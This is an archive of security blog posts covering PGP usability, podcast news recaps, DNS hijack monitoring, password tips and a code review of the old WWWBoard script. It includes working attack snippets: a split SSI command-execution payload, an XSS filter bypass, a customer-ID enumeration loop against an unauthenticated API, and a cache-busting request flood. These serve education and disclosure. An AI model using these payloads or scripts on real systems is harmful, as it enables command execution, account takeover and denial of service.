Tag Archives: web application security

PGP: Still hard to use after 16 years

Earlier this month, SC magazine ran an article about this tweet from Joseph Bonneau at the Electronic Frontier Foundation:

Email from Phil Zimmermann: “Sorry, but I cannot decrypt this message. I don’t have a version of PGP that runs on any of my devices”

PGP, short for Pretty Good Privacy, is an email encryption system invented by Phil Zimmermann in 1991. So why isn’t Zimmermann eating his own dog food?

“The irony is not lost on me,” he says in this article at Motherboard, which is about PGP’s usability problems. Jon Callas, former Chief Scientist at PGP, Inc., tweeted that “We have done a good job of teaching people that crypto is hard, but cryptographers think that UX is easy.” For a cryptographer, it would be easy to forget that 25% of people have math anxiety. Cryptographers are used to creating timing-attack-resistant implementations of AES; you can get a great sense of what’s involved from this explanation of AES, which is illustrated with stick figures. The steps are very complicated, and in the general population, surprisingly few people can follow complex written instructions.

All the way back in 1999, there was a paper presented at USENIX called “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0.” It included a small study with a dozen reasonably intelligent people:

The user test was run with twelve different participants, all of whom were experienced users of email, and none of whom could describe the difference between public and private key cryptography prior to the test sessions. The participants all had attended at least some college, and some had graduate degrees. Their ages ranged from 20 to 49, and their professions were diversely distributed, including graphic artists, programmers, a medical student, administrators and a writer.

The participants were given 90 minutes to learn and use PGP, under realistic conditions:

Our test scenario was that the participant had volunteered to help with a political campaign and had been given the job of campaign coordinator (the party affiliation and campaign issues were left to the participant’s imagination, so as not to offend anyone). The participant’s task was to send out campaign plan updates to the other members of the campaign team by email, using PGP for privacy and authentication. Since presumably volunteering for a political campaign implies a personal investment in the campaign’s success, we hoped that the participants would be appropriately motivated to protect the secrecy of their messages…

After briefing the participants on the test scenario and tutoring them on the use of Eudora, they were given an initial task description which provided them with a secret message (a proposed itinerary for the candidate), the names and email addresses of the campaign manager and four other campaign team members, and a request to please send the secret message to the five team members in a signed and encrypted email. In order to complete this task, a participant had to generate a key pair, get the team members’ public keys, make their own public key available to the team members, type the (short) secret message into an email, sign the email using their private key, encrypt the email using the five team members’ public keys, and send the result. In addition, we designed the test so that one of the team members had an RSA key while the others all had Diffie-Hellman/DSS keys, so that if a participant encrypted one copy of the message for all five team members (which was the expected interpretation of the task), they would encounter the mixed key types warning message. Participants were told that after accomplishing that initial task, they should wait to receive email from the campaign team members and follow any instructions they gave.

If that’s mystifying, that’s the point. You can get a very good sense of how you would’ve done, and of how much has changed in 16 years, by reading the Electronic Frontier Foundation’s guide to using PGP on a Mac.
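
Stripped of the GUI, the task itself boils down to a handful of steps. Here is a rough sketch of it in terms of today’s GnuPG command line, driven from Perl purely for illustration (the study used the PGP 5.0 GUI, and the names and addresses below are made up):

#!/usr/bin/perl
# The study's task restated as GnuPG invocations.
use strict;
use warnings;

# 1. Generate your own key pair (interactive prompts).
system 'gpg', '--gen-key';

# 2. Import each team member's public key, and export your own
#    public key so the team can encrypt replies to you.
system 'gpg', '--import', 'manager.asc';
system 'gpg', '--armor', '--export', 'coordinator@example.org';

# 3. Sign with YOUR private key, and encrypt to EVERY recipient's
#    public key -- the step most of the study's participants got
#    backwards.
system 'gpg', '--sign', '--encrypt',
    '-r', 'manager@example.org',
    '-r', 'member1@example.org',
    'itinerary.txt';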

Things went wrong immediately:

Three of the twelve test participants (P4, P9, and P11) accidentally emailed the secret to the team members without encryption. Two of the three (P9 and P11) realized immediately that they had done so, but P4 appeared to believe that the security was supposed to be transparent to him and that the encryption had taken place. In all three cases the error occurred while the participants were trying to figure out the system by exploring.

Cryptographers are absolutely right that cryptography is hard:

Among the eleven participants who figured out how to encrypt, failure to understand the public key model was widespread. Seven participants (P1, P2, P7, P8, P9, P10 and P11) used only their own public keys to encrypt email to the team members. Of those seven, only P8 and P10 eventually succeeded in sending correctly encrypted email to the team members before the end of the 90 minute test session (P9 figured out that she needed to use the campaign manager’s public key, but then sent email to the entire team encrypted only with that key), and they did so only after they had received fairly explicit email prompting from the test monitor posing as the team members. P1, P7 and P11 appeared to develop an understanding that they needed the team members’ public keys (for P1 and P11, this was also after they had received prompting email), but still did not succeed at correctly encrypting email. P2 never appeared to understand what was wrong, even after twice receiving feedback that the team members could not decrypt his email.
Another of the eleven (P5) so completely misunderstood the model that he generated key pairs for each team member rather than for himself, and then attempted to send the secret in an email encrypted with the five public keys he had generated. Even after receiving feedback that the team members were unable to decrypt his email, he did not manage to recover from this error.

The user interface can make it even harder:

P7 gave up on using the key server after one failed attempt in which she tried to retrieve the campaign manager’s public key but got nothing back (perhaps due to mis-typing the name). P1 spent 25 minutes trying and failing to import a key from an email message; he copied the key to the clipboard but then kept trying to decrypt it rather than import it. P12 also had difficulty trying to import a key from an email message: the key was one she already had in her key ring, and when her copy and paste of the key failed to have any effect on the PGPKeys display, she assumed that her attempt had failed and kept trying. Eventually she became so confused that she began trying to decrypt the key instead.

This is all so frustrating and unpleasant for people that they simply won’t use PGP. We actually have a way of encrypting email that’s not known to be breakable by the NSA. In practice, the human factors are even more difficult than stumping the NSA’s cryptographers!

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkeley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • GitHub
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duo Security 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • AppArmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API to WordPress.org for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but no one can know all of these technologies in depth at once, especially given how quickly they change. And so we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the number of full-stack security experts. People may know quite a bit about a lot of these technologies, but any single security person is likely to become more and more specialized over time; specialization is simply hard to avoid, given the growing complexity of modern apps. As a result, we may eventually see the death of the full-stack security person as well.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means there will be more and more silos, where people handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failure to draw on diverse, and often external, security and operations expertise will ensure sec-ops failure.

At its heart, this is a result of economic forces: more code needs to be delivered, and there are fewer people who understand what it’s actually doing. So you outsource what you can’t know, since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other service providers, and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies, and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report, which explores the outcomes of that maturation.

As part of that research, we explored some of the activities being undertaken within application security programs, and we were impressed to see that 87% of respondents perform static analysis: 32% perform it with each major release, and 13% perform it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibility into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion, and perhaps intentional fear, uncertainty and doubt (FUD), in this area. The way you go about testing third-party software should mirror the way you go about testing your own software. Binary analysis, performed so as not to expose your Intellectual Property (IP), is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while it requires some effort, is no real obstacle: tools such as ILSpy and Show My Code are freely and widely available. Sharing your binaries in an attempt to protect your Intellectual Property actually ends up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries as well. That means being careful never to turn on the compilation options that some vendors require to enable binary review. At a very minimum, it means those same binaries should never be uploaded to production, where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP, you need to make certain your binaries don’t fall into the wrong hands, because inside those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

#HackerKast 23: Lenovo, Venmo Sex, Drugs, and Guns, Casino Hacked, WordPress, Remotely Hacking Cars

Hey everybody! Welcome to this week’s HackerKast. We’ve got Jer back! We put this one out late this week just to get him back in the mix.

First, we absolutely HAD to talk about Lenovo and Superfish. For those living under a rock, Superfish is installed by default on Lenovo laptops and does all sorts of nasty MITM things, breaking SSL locally to inspect traffic. They did this under the guise of advertising (of course), but it was awful once we all found out. Robert Graham over at Errata Security did a great writeup of the technical deep dive he did into what was going on with these certificates.

Tied to that same story, Lizard Squad reared its head again with its specialty, a DNS hack! Their target this time was Lenovo, due to recent events, and they were able to take over Lenovo’s domain through command injection at its registrar. Brian Krebs did some digging and realized it was all due to the WebNIC registrar being vulnerable to an attack.

Moving along to a fun clickbait story with an actually funny privacy twist: Venmo made the news this week in a bad way. The headline we couldn’t ignore was “New Site Tells You Who’s Paying For Sex, Drugs, and Alcohol Using Venmo.” Sounds interesting, right? Well, it turns out Venmo has turned itself into a bit of a social network built on who is giving money to whom and for what. The kicker is that all of that information goes to a public timeline unless it is specifically turned private, and nobody bothers to change the setting. So a site called Vicemo popped up to gather all the illicit payments and put them in its own feed. Check out all the amusing things people are sharing money for.

Next, Jer talked about a few more details of a story we covered back in 2014, about a Las Vegas casino getting hacked via a public-facing development site. The hack is being attributed to Iranians who ran amok once they got inside the casino’s network – and they got in through that dev site only after spending a lot of time brute forcing the VPN to no avail. Just goes to show how important it is to figure out which of your websites are public facing!

We had to talk about this next one even though it’s a bit embarrassing. We’ve all got vulns! Even WhiteHat! We eat our own dog food and run our scanner on our own website constantly, and we found a bug on our blog caused by the WordPress plugin we use to publish our podcast on iTunes. Imagine that… a WordPress plugin causing a vulnerability… who woulda thunk? Anyway, we emailed the developer and in the meantime coded up a hotfix, after immediately removing the plugin from production. Before we even got a chance to hot patch with our own code, though, the plugin’s developer in South Africa woke up and rolled out his own fix in less than a day. Good news all around!

Lastly we talked about a fun and scary news story about remotely bricking cars. Some car dealerships install little black boxes in the cars they sell, which are used to remotely disable the car if people get behind on their payments, making the cars easier to repossess. What were all of these black boxes controlled by? A web app! An IT guy who had left the company “hacked” back in (my guess is he used access that hadn’t been turned off yet) and started remotely shutting down cars in Texas left and right. This brings up a bit of a conversation about the Internet of Things, where Robert does what he does best and scares everybody off the Internet.

Sorry for the late one this week, hope you all enjoyed!

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay


Lenovo shipping with pre-installed Adware and SSL certificate “Komodia”
Extracting the Superfish Certificate
Lenovo’s DNS Gets Hijacked by Lizard Squad using Command Injection in Registrar
Webnic Registrar Blamed for Hijack of Lenovo, Google Domains
Site Discloses Who is Paying for Sex, Drugs and Guns
Las Vegas Casino Hacked by Iranians in 2014
The time a hacker remotely bricked cars in Texas

Notable stories this week that didn’t make the cut:
AT&T Extorts Users For Privacy
Cybersecurity Czar Claims Selfies Are Good Biometrics
HTTP/2.0 “Finalized”
Google’s new Hacker Classifier Misclassifies Websites As Hacked
GCHQ & NSA’s Great SIM Heist
Turbotax’s Anti-Fraud Efforts Under Scrutiny
Origins of Russian Astroturfing
Google Making Adult Blogs Private – Effectively Shutting Them Down
Infinity Million Bug Bounty for Pwnium
Net Neutrality Passed!

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of attacks against and/or hijacking of DNS, it occurred to me that most people really don’t know what to do about it. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Smaller companies, which may not have as many customers, or which only accept comments through a website, may never know unless they check at random – or until the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes, a Perl script) that can be run out of cron to monitor one or more hostname-to-IP-address pairs for sites that are critical to you. If anything changes, it’ll send you an alert via email. There are other tools that do this or similar things, but it’s another tool in your arsenal; and most importantly, dnstest is meant to be very lightweight and simple to use. You can download dnstest here.
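
To give a sense of how little is involved (this is a sketch of the concept, not the actual dnstest.pl, and the host/IP pairs are made up), the core loop is just resolve, compare, alert:

#!/usr/bin/perl
# Resolve each critical hostname and complain if it no longer points
# where you expect. Meant to run out of cron.
use strict;
use warnings;
use Socket;

my %expected = (
    'www.example.com'  => '192.0.2.10',
    'mail.example.com' => '192.0.2.25',
);

for my $host (sort keys %expected) {
    my $packed = gethostbyname($host);
    my $ip = defined $packed ? inet_ntoa($packed) : 'NXDOMAIN';
    next if $ip eq $expected{$host};
    # The real tool emails you; a warning keeps the sketch short.
    warn "ALERT: $host resolves to $ip, expected $expected{$host}\n";
}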

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

Web Security for the Tech-Impaired: Passwords that Pass the Test

In my last post, “The Dangers of Email”, I explored ways that folks who are less than technically savvy can practice good email security hygiene. Today we’ll get into a somewhat controversial subject: passwords. You use them every day to log in to your bank account, credit card, Amazon — the list goes on and on. You probably log in to a few websites every day, but how often do you think about the password you’ve chosen? Password security is a hot-button topic and everyone has their own suggestion about what constitutes a good, strong password. This post will help guide you to a relatively secure password.

Your password is the key to your online accounts. It’s the ID you create to prove that you are who you say you are in a digital world. As humans, we tend to make passwords that are easy to remember, because if you forget your password you often face a difficult series of steps to recover it, from answering security questions to calling a support line. To skip all that headache, we often create passwords that are pretty easy to guess, and we use those same passwords for all our accounts. This makes things very easy for an attacker: if one site where I use that password is compromised and my password is leaked, the attackers now know my password for every single account I’ve created. No matter how quickly I change those passwords, I will most likely miss or forget one. This is why it’s a good idea to use a variety of passwords. Very secure folks will create a different password for every account; I would recommend that, at the very least, you create separate passwords for your sensitive accounts (your bank account, credit card, 401k, and so on).

Now the question is, what is considered a good password? It might surprise you to know that modern computers can ‘guess’ passwords very quickly – millions of potential passwords per second when attacking a stolen password database offline. Passwords that are just dictionary words are incredibly weak and can be guessed almost immediately. Short passwords are out, too: most experts agree that passwords should be at least 12 characters long. To make it harder to break, your password should contain a mixture of upper case and lower case characters, numbers, and special characters (such as !, @, #, $, ?). It’s also a good idea to vary where these characters are placed. A friend of mine recently played ‘mind reader’ with some colleagues of mine. He had each of them think of one of their passwords, then guessed that it started with a word of about 8 characters, followed by two numbers, with a special character as the final character. They were dumbfounded. Yes, the human brain works the same way for all of us: as we’re asked to do more and more things to our passwords, we simply tack them on at the end. This is a pattern that hackers know about and will exploit.
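
To make that pattern concrete, here is a tiny hypothetical Perl check for exactly the layout my friend “mind read” (a sketch, not a real strength meter; the sample passwords are made up):

#!/usr/bin/perl
# Flag the predictable "word, then digits, then one special character"
# layout, plus the too-short case.
use strict;
use warnings;

for my $pw ('sunshine42!', 'correct#horse7battery') {
    if ($pw =~ /^[A-Za-z]+\d{1,4}[^A-Za-z0-9]$/) {
        print "'$pw' follows the guessable word-number-special pattern\n";
    }
    elsif (length $pw < 12) {
        print "'$pw' is shorter than 12 characters\n";
    }
    else {
        print "'$pw' at least avoids the most common pattern\n";
    }
}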

So to sum up, here are some tips to help you practice good password habits:
1) Use a different password for all your important accounts. To win a gold star, use a different password for every account.
2) Your password should be no fewer than 12 characters.
3) Use a mix of lower case, upper case, numbers, and special characters.
4) Don’t use the very common sequence of word-number-special character. Mix up where these elements are placed in your password.

Again, I urge our readers to feel free to forward this post to friends or family who may benefit from these tips. Many in the security industry often forget that most consumers are less technically savvy, and therefore less security aware, than we are. This series is designed to help you help them.

#HackerKast 16: India blocks GitHub, GoGo fake SSL certificates, North Korea’s only network

Happy 2015 everybody! Jeremiah, Robert, and I got right back on track our first week back in the office and there were plenty of stories to talk about. Turns out hackers don’t really take vacation.

Right off the bat, Robert brought up a story about the Indian government pulling a China and blocking access to a ton of sites this week. Notable sites include Pastebin, Dailymotion, and GitHub, according to reports coming from Indian users. The reasons cited all have to do with anti-terrorism and blocking potential terrorists’ access to sites that can be used as virtual dead drops. This seems like a complete overreaction to us and has some serious overarching repercussions – most obviously, that a giant chunk of the world’s developers can no longer access the largest collection of open source code, GitHub. We’ll see where this goes, but if you’re an investor in VPN services you probably have a big smile on your face right about now.

Next, I brought up some disturbing tweets that caught my eye this week about GoGo Inflight WiFi. If any of you are frequent flyers like us, you’ve undoubtedly been forced to use GoGo at some point, and a few technically savvy users recently noticed GoGo is up to no good. While browsing the internet in the air, they saw that GoGo was issuing fake SSL certificates for certain websites such as Google and YouTube. Ironically, the user who first drew attention to this was an engineer who works for Google. This effectively allows GoGo to man-in-the-middle all of its users’ SSL traffic and read sensitive data that should be encrypted. Spokespeople from GoGo have stated this is only used to block or throttle video streaming services so that there is enough bandwidth to go around, but it is still pretty shady that they have access to sensitive information.
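
Incidentally, you don’t need special tooling to spot this kind of interception: compare the certificate issuer you see in the air with the one you see on the ground. Here is a hypothetical check using Perl’s IO::Socket::SSL module from CPAN:

#!/usr/bin/perl
# Print the issuer of the certificate a host presents to us. A forged
# in-flight certificate will show a different issuer than the site's
# real certificate authority.
use strict;
use warnings;
use IO::Socket::SSL;

my $sock = IO::Socket::SSL->new(
    PeerHost        => 'www.google.com',
    PeerPort        => 443,
    # Verification is off on purpose: we want to inspect a forged
    # certificate rather than refuse the connection.
    SSL_verify_mode => SSL_VERIFY_NONE,
) or die "connect failed: $SSL_ERROR";

print 'Issuer: ', $sock->peer_certificate('issuer'), "\n";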

Next, Robert found a fun image floating around of a (the?) North Korean web browser called Naenara Browser:


This was just something really quick we wanted to bring up, because the screenshot shows that as soon as you install this browser, it makes a call to an RFC 1918 (private) address from your computer. The implication, which left my jaw open, is that all of North Korea is on the same network. As in an intranet. Things that make you go “Wah?”.

Ever think you found something cool and couldn’t wait to share it with your friends? Well, don’t share it with RSnake, because he probably knows about it already. Such was the case with this “recent” HSTS (HTTP Strict Transport Security) research coming out of the UK. A few weeks ago you might remember us mocking Google’s former CEO Eric Schmidt over his claim that Google’s Incognito mode would protect you from the NSA. Well, after we all facepalmed collectively on the podcast, this researcher in the UK set out to prove Schmidt wrong. The short version: because the browser remembers which hosts have demanded HTTPS, a site can write a unique identifier into that HSTS store across a set of subdomains and read the bits back later, deanonymizing you. Robert gets into the nitty-gritty of how HSTS works, which is super interesting and deserves a read through some of these blog posts.

Lastly, we talked about Moonpig. Not to be confused with Pigs In Space.


This Moonpig is an online mail-order greeting card service. While most mail-order greeting card services are at the forefront of information security, Moonpig fell victim to a vulnerability in their API which allowed full account takeover of any user. Their API was poorly designed and had no authentication at all, so a quick flip of a customerID parameter was enough to start impersonating other users, placing fake orders, stealing credit card information, etc. The kicker is that the vulnerability was responsibly disclosed to Moonpig back in August of 2013, and Moonpig responded that they’d “get right on it.” Frustrated with waiting for a fix, this researcher and Moonpig user wrote to them again in September 2014, and the reply this time was that a fix was coming before Christmas. Well, New Year’s has just passed, so the researcher decided to publish his findings publicly, and guess what? Less than 24 hours and an Engadget article later, the API was pulled offline – some 17 months after the initial report. Another unfortunate win for Full Disclosure.
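
For anyone who hasn’t seen an IDOR (insecure direct object reference) like this before, the whole attack is a for-loop. A hypothetical sketch in Perl (the endpoint and parameter names are made up; Moonpig’s real API differed in its details):

#!/usr/bin/perl
# Walk sequential customer IDs against an API that never checks who is
# asking. Every 200 response is someone else's account data.
use strict;
use warnings;
use LWP::UserAgent;

my $ua = LWP::UserAgent->new;
for my $customer_id (1000 .. 1002) {
    my $res = $ua->get(
        "https://api.example.com/customer/$customer_id/details");
    printf "customerID %d: HTTP %s\n", $customer_id, $res->code;
}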

We closed off with some musings about time-to-fix statistics and overall browser security suggestions for everyday people. Unfortunately, we are going to have to break the web to fix the web. There is a Dan Kaminsky quote about this never happening somewhere…

That’s all for this week. Stay tuned for next week when hopefully we’ll have some bonus footage for you all. Also! Check us out in iTunes now for those of you who like that sort of thing and would rather just listen to the podcast instead of staring at our mugs for 15-20 minutes.

Happy New Year!

Notable stories this week that didn’t make the cut:
Banks doing Hack-back being investigated by FBI
PlayStation Network attack may have just been a ploy to market a DDoS tool
But then one of the alleged Lizard Mafia guys got arrested, and another is being questioned
Katie from HackerOne was detained and forced to decrypt her laptop in France – don’t travel with exploits or anything you care about!
$5M US in Bitcoin stolen from Bitstamp in unexplained hack

Pastebin, Dailymotion, Github blocked after DoT order: Report
Gogo issues fake HTTPS certificate to users visiting YouTube
North Korean Browser
Brit Proves Google’s Eric Schmidt Totally Wrong: Super Cookies Can Track Users Even When In Incognito Mode
Moonpig flaw leaves customer accounts wide open for 17 months (update)

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to the extensive collection of vulnerabilities that they have gathered over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the first thing I notice is the nice upward trend as the web began to really take off, followed by the real birth of web application vulnerabilities in the mid-2000s. One thing that struck me as very odd, though, is that we’ve been seeing a downward trend in web application vulnerabilities since 2008:

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch to something new, which means the incumbent code is less likely to be replaced and new frameworks are less likely to be adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, with a focus on custom web application code (e.g. your local bank, PayPal, Facebook) rather than open source code used by many websites. Those vulnerabilities wouldn’t be reported in data like this, as vulnerability databases do not track site-specific issues, and the sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility once the ecosystem evolves to the point where publicly reporting vulnerabilities is more annoying for researchers, provides fewer benefits, and ultimately makes their lives more difficult than working with the vendors directly or holding onto their findings. The growth of bug bounties, where researchers get paid for disclosing a newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and should be watched carefully. It could be a hybrid of a number of these factors as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to decrease the numbers further. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 of those were remotely exploitable (meaning a remote attacker is involved and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be as common as they have ever been, or more so. Said another way: compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem not to understand how this works, or even that it’s possible, despite my multiple attempts at explaining it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavy, database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter value pairs each time to bypass caching servers like Varnish. An adversary wouldn’t run this kind of code directly, because the flood would come from their own IP address; it’s much more likely to be used by an adversary who tricks a large swath of people into executing it. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
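
The actual FlashFlood is JavaScript meant to run in a browser; the cache-busting trick itself, though, fits in a few lines of anything. Here it is sketched in Perl against a made-up host (only ever point something like this at a server you own):

#!/usr/bin/perl
# Every request carries a never-before-seen query string, so Varnish
# (or any cache keyed on the full URL) misses every time and the
# origin server does real work for every single hit.
use strict;
use warnings;
use LWP::UserAgent;

my $ua  = LWP::UserAgent->new;
my $url = 'http://test.example.com/';

for (1 .. 100) {
    my $bust = $url . '?cachebust=' . time() . int rand 1e9;
    $ua->get($bust);
}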

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot clearer than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of our modern knowledge of web application security to 20-year-old tech? So I took a look at the message board, WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:


I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, a number of vulns have been found in it over the years – four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past a Perl regex if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it into two chunks that execute together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically, it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue:

Body is: <img src="" onerror='alert("XSS");'

Unlike with SSI, I don’t have to worry about supplying a closing tag myself – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it works on modern browsers more reliably than SSI does on today’s websites.
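
For what it’s worth, the durable fix here isn’t a better stripping regex; it’s encoding. Turn the user’s input into inert text instead of trying to enumerate every dangerous construct. A minimal sketch of that approach, in the same flavor of Perl (my suggestion, not code from Matt’s script):

# Encode rather than strip: ampersands first, then brackets and
# quotes, so nothing the user submits can ever be parsed as markup.
$value =~ s/&/&amp;/g;
$value =~ s/</&lt;/g;
$value =~ s/>/&gt;/g;
$value =~ s/"/&quot;/g;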

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional corners all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things really were, though, and how little security there really was when the web was in its infancy.